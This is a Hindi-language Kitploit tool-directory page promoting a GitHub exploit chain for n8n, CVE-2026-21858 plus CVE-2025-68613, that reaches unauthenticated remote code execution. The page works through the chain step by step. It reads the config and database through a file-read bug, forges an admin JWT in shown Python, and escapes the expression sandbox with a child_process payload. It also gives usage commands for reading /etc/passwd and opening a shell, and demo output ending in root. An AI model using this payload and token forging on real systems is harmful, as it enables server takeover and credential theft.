Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-21858 — n8n के लिए स्वचालित एक्सप्लॉइट श्रृंखला जो मनमाना फ़ाइल पठन, एडमिन टोकन जालसाज़ी, और सैंडबॉक्स बायपास को जोड़कर बिना प्रमाणीकरण के रिमोट कोड निष्पादन प्राप्त करती है। | Kitploit
उपकरण/GitHubGitHub/alhakim88/cve-2026-21858
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubalhakim88/cve-2026-21858

CVE-2026-21858

n8n के लिए स्वचालित एक्सप्लॉइट श्रृंखला जो मनमाना फ़ाइल पठन, एडमिन टोकन जालसाज़ी, और सैंडबॉक्स बायपास को जोड़कर बिना प्रमाणीकरण के रिमोट कोड निष्पादन प्राप्त करती है।

रिपॉजिटरी देखें
168 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-21858 + CVE-2025-68613 - n8n पूर्ण श्रृंखला

बिना प्रमाणीकरण के मनमाना फ़ाइल पठन → एडमिन टोकन फोर्ज → सैंडबॉक्स बाईपास → RCE

CVECVE-2026-21858 (AFR) + CVE-2025-68613 (RCE)
CVSS10.0 + 9.9 (क्रिटिकल)
प्रभावित<= 1.65.0 (AFR) / >= 0.211.0 (RCE)
ठीक किया गया1.121.0 (AFR) / 1.120.4+ (RCE)
खुलासा2026-01-07 11:09 UTC
कोडनेमNi8mare
श्रेयDor Attias (Cyera)
एक्सप्लॉइटChocapikk
प्रक्रियाAI-स्वचालित: पैच डिफ → रीप्रो → लैब → एक्सप्लॉइट (~9 घंटे खुलासे के बाद)
प्रकारप्रूफ ऑफ कॉन्सेप्ट - सार्वभौमिक एक्सप्लॉइट नहीं (विशिष्ट वर्कफ़्लो कॉन्फ़िगरेशन की आवश्यकता है, सीमाएँ देखें)

TL;DR

n8n पर पूर्ण बिना प्रमाणीकरण वाली RCE श्रृंखला:

  1. CVE-2026-21858 - Content-Type भ्रम → मनमाना फ़ाइल पठन
  2. कॉन्फ़िग + डेटाबेस पढ़ें → एडमिन JWT फोर्ज करें
  3. CVE-2025-68613 - एक्सप्रेशन इंजेक्शन → सैंडबॉक्स बाईपास → RCE

पहचान

यह जोखिम संस्करण-आधारित है। जोखिम के संदर्भ में, सार्वजनिक रूप से सुलभ कमजोर n8n इंस्टेंस मौजूद हैं।

LeakIX परिणाम: उजागर इंस्टेंस देखें

LeakIX Detection Results

यह एक्सप्लॉइट क्यों?

यह एक्सप्लॉइट Cyera राइट-अप से स्वतंत्र रूप से विकसित किया गया था (पूरा होने के बाद खोजा गया)। मुख्य अंतर:

Cyera (मूल शोध)यह एक्सप्लॉइट
फ़ाइल पठनAI ज्ञान आधार में लोड करें → चैट के माध्यम से क्वेरी करेंसीधा HTTP प्रतिक्रिया
पूर्वापेक्षाएँचैट वर्कफ़्लो + AI एकीकरणफ़ाइल अपलोड वाला कोई भी फ़ॉर्म
RCE विधि"Execute Command" नोड (डिफ़ॉल्ट रूप से अक्षम)एक्सप्रेशन इंजेक्शन (डिफ़ॉल्ट इंस्टॉल पर काम करता है)
स्वचालनमैनुअल/अवधारणात्मक डेमोपूरी तरह से स्वचालित Python स्क्रिप्ट

दोनों दृष्टिकोणों के लिए विशिष्ट वर्कफ़्लो कॉन्फ़िगरेशन की आवश्यकता होती है। Cyera को चैट + AI एकीकरण की आवश्यकता है, इस एक्सप्लॉइट को Respond नोड वाले फ़ॉर्म की आवश्यकता है। विवरण के लिए सीमाएँ देखें।

हमला श्रृंखला

┌───────────────────────────────────────────────────────────┐
│                     बिना प्रमाणीकरण                       │
├───────────────────────────────────────────────────────────┤
│  1. /proc/self/environ पढ़ें → HOME निर्देशिका खोजें      │
│  2. $HOME/.n8n/config पढ़ें → encryptionKey प्राप्त करें  │
│  3. $HOME/.n8n/database.sqlite पढ़ें → एडमिन क्रेडेंशियल  │
├───────────────────────────────────────────────────────────┤
│                      टोकन फोर्ज                           │
├───────────────────────────────────────────────────────────┤
│  4. encryptionKey से JWT सीक्रेट प्राप्त करें             │
│  5. एडमिन सत्र कुकी फोर्ज करें                            │
├───────────────────────────────────────────────────────────┤
│                    प्रमाणित RCE                           │
├───────────────────────────────────────────────────────────┤
│  6. एक्सप्रेशन इंजेक्शन के साथ वर्कफ़्लो बनाएं            │
│  7. this.process.mainModule.require के माध्यम से सैंडबॉक्स │
│     बाईपास                                                │
│  8. मनमाने कमांड निष्पादित करें                           │
└───────────────────────────────────────────────────────────┘

CVE-2026-21858 - Content-Type भ्रम के माध्यम से मनमाना फ़ाइल पठन

पैच

commit c8d604d2c466dd84ec24f4f092183d86e43f2518
Author: mfsiega
Date:   Thu Nov 13 11:51:40 2025 +0100

    Merge commit from fork

प्रसिद्ध "Merge commit from fork" - जब आप यह देखते हैं, तो किसी ने कुछ मसालेदार खोजा है। 🌶️

मूल कारण

// पहले (कमजोर)
const files = (context.getBodyData().files as IDataObject) ?? {};
await context.nodeHelpers.copyBinaryFile(file.filepath, ...)

// बाद में (ठीक किया गया)
a.ok(req.contentType === 'multipart/form-data', 'Expected multipart/form-data');

Content-Type: application/json भेजें → filepath नियंत्रित करें → कोई भी फ़ाइल पढ़ें।

CVE-2025-68613 - एक्सप्रेशन इंजेक्शन RCE

यह बाईपास क्यों?

n8n उपयोगकर्ता कोड (Code Node, एक्सप्रेशन) को vm2/isolated-vm का उपयोग करके सैंडबॉक्स करता है। अन्य RCE वेक्टर:

तकनीकस्थिति
Execute Command Nodeडिफ़ॉल्ट रूप से अक्षम (N8N_ALLOW_EXEC_COMMAND=false)
SSH/HTTP Nodesरिमोट सर्वर पर निष्पादित करें, n8n होस्ट पर नहीं
Pyodide सैंडबॉक्स एस्केपCVE-2025-68668 - Python Code Node की आवश्यकता है
एक्सप्रेशन इंजेक्शनCVE-2025-68613 - डिफ़ॉल्ट इंस्टॉल पर काम करता है

मैंने एक्सप्रेशन इंजेक्शन का उपयोग किया क्योंकि यह डिफ़ॉल्ट सेटिंग्स वाले किसी भी n8n पर काम करता है - कोई विशेष नोड या कॉन्फ़िगरेशन की आवश्यकता नहीं है। Pyodide बाईपास (CVE-2025-68668) के लिए Python Code Node की आवश्यकता होती है जो सभी इंस्टेंस पर उपलब्ध नहीं हो सकता है।

पेलोड

={{ (function() { 
  var require = this.process.mainModule.require; 
  var execSync = require("child_process").execSync; 
  return execSync("id").toString(); 
})() }}

n8n एक्सप्रेशन के पास this.process.mainModule.require तक पहुंच है → पूर्ण सैंडबॉक्स एस्केप।

टोकन फोर्ज

# JWT सीक्रेट व्युत्पत्ति
jwt_secret = sha256(encryption_key[::2]).hexdigest()

# JWT हैश
jwt_hash = b64encode(sha256(f"{email}:{password_hash}")).decode()[:10]

# टोकन फोर्ज करें
token = jwt.encode({"id": user_id, "hash": jwt_hash}, jwt_secret, "HS256")

लैब सेटअप

docker compose up -d
# सेटअप के लिए ~60 सेकंड प्रतीक्षा करें
# फ़ॉर्म: http://localhost:5678/form/vulnerable-form
# क्रेडेंशियल: [email protected] / password

उपयोग

# मनमाना फ़ाइल पढ़ें
uv run python exploit.py http://localhost:5678 /form/vulnerable-form --read /etc/passwd

# कमांड के साथ पूर्ण श्रृंखला
uv run python exploit.py http://localhost:5678 /form/vulnerable-form --cmd "id"

# इंटरैक्टिव शेल
uv run python exploit.py http://localhost:5678 /form/vulnerable-form

डेमो

╔═══════════════════════════════════════════════════════════════╗
║     CVE-2026-21858 + CVE-2025-68613 - n8n Full Chain          ║
║     Arbitrary File Read → Token Forge → Sandbox Bypass → RCE  ║
╚═══════════════════════════════════════════════════════════════╝

[*] Target: http://localhost:5678/form/vulnerable-form
[*] Version: 1.65.0 (VULN)
[x] HOME directory
[+] HOME directory: /root
[x] Encryption key
[+] Encryption key: yusrXZV1...
[x] Database
[+] Database: 1327104 bytes
[x] Admin user
[+] Admin user: [email protected]
[x] Token forge
[+] Token forge: OK
[x] Admin access
[+] Admin access: GRANTED!
[+] Cookie: n8n-auth=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjljMWI5MzU0LTI5NzQtNGZlOS05OTc2LWVmZDM3ZWEyNWFlMiIsImhhc2giOiJGYzVQZjVkUDRxIn0.TrIjHV3_6pw6Syi4qme5larZeQElBJmo4Y_eSgL9_M0
[x] RCE
[+] RCE: OK

uid=0(root) gid=0(root) groups=0(root)

सीमाएँ

यह "किसी भी n8n को हैक करने वाला" एक्सप्लॉइट नहीं है। इसे काम करने के लिए विशिष्ट शर्तों की आवश्यकता होती है:

आवश्यकताविवरण
फ़ाइल अपलोड वाला फ़ॉर्मलक्ष्य में फ़ाइल अपलोड फ़ील्ड वाला फ़ॉर्म वर्कफ़्लो होना चाहिए
Respond to Webhook नोडवर्कफ़्लो को HTTP प्रतिक्रिया में फ़ाइल सामग्री लौटानी चाहिए
वर्कफ़्लो सक्रियफ़ॉर्म वर्कफ़्लो सक्रिय होना चाहिए
बिना प्रमाणीकरण पहुंचफ़ॉर्म सार्वजनिक रूप से सुलभ होना चाहिए (कोई प्रमाणीकरण नहीं)

कमजोर वर्कफ़्लो कॉन्फ़िगरेशन का उदाहरण:

टूल डाउनलोड करें